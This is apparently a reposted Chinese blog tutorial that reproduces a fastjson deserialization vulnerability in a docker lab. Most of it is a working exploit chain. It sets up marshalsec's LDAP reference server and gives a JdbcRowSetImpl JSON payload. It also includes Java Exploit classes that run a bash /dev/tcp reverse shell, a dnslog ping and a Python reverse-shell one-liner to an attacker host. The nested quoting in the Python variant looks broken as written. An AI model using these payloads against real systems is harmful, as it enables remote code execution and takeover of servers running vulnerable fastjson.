fastjson反序列化
准备
1.marshalsec ---可用jar包 参考:
github:https://github.com/LeadroyaL/cve-2019-14540-exploitgit clone https://github.com/mbechler/marshalsec.gitmvn package -D skipTests-DskipTests,不执行测试用例,但编译测试用例类生成相应的class文件至target/test-classes下。marshalsec-0.0.3-SNAPSHOT-all.jar完成 2.编译生成Exploit.class Exploit.java:
import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{public Exploit() throws Exception {Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/xx.xx.xx.xx/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});InputStream is = p.getInputStream();BufferedReader reader = new BufferedReader(new InputStreamReader(is));String line;while((line = reader.readLine()) != null) {System.out.println(line);}p.waitFor();is.close();reader.close();p.destroy();}public static void main(String[] args) throws Exception {}}
编译Exploit.java会生成一个Exploit.class文件
javac Exploit.java
同目录下生成一个Exploit.class 准备工作完成,同目录下存在文件:
3.docker环境
开始
1.漏洞是利用了LDAP服务重定向请求从而构造成利用,所有要先开启web服务,把准备工作的三个文件放在web下面。利用python开启简单的http服务
python2:python2 -m SimpleHTTPServer 9090
python3python3 -m http.server 9090
2.服务器使用marshalsec开启LDAP服务监听,借助LDAP服务将LDAP reference result 重定向到web服务器
在marshalsec-0.0.3-SNAPSHOT-all.jar包下。
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:port/#Exploit 9999
3.为了方便测试,首先采取了ping dnslog来测试 修改为ping
import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{public Exploit() throws Exception {Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","ping sdf3g5.dnslog.cn"});InputStream is = p.getInputStream();BufferedReader reader = new BufferedReader(new InputStreamReader(is));String line;while((line = reader.readLine()) != null) {System.out.println(line);}p.waitFor();is.close();reader.close();p.destroy();}public static void main(String[] args) throws Exception {}
编译成class。
4.进行攻击 exp:
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:9999/Exploit","autoCommit":true}}
5.尝试反弹shell,采用python进行反弹
python反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.13.132",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'把ping修改成python反弹
import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{public Exploit() throws Exception {Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.13.132",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"});InputStream is = p.getInputStream();BufferedReader reader = new BufferedReader(new InputStreamReader(is));String line;while((line = reader.readLine()) != null) {System.out.println(line);}p.waitFor();is.close();reader.close();p.destroy();}public static void main(String[] args) throws Exception {}}
编译成class 本地开启http,使用marshalsec开启LDAP服务监听,运行返回shell
原文始发于微信公众号(极梦C):fastjson反序列化复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论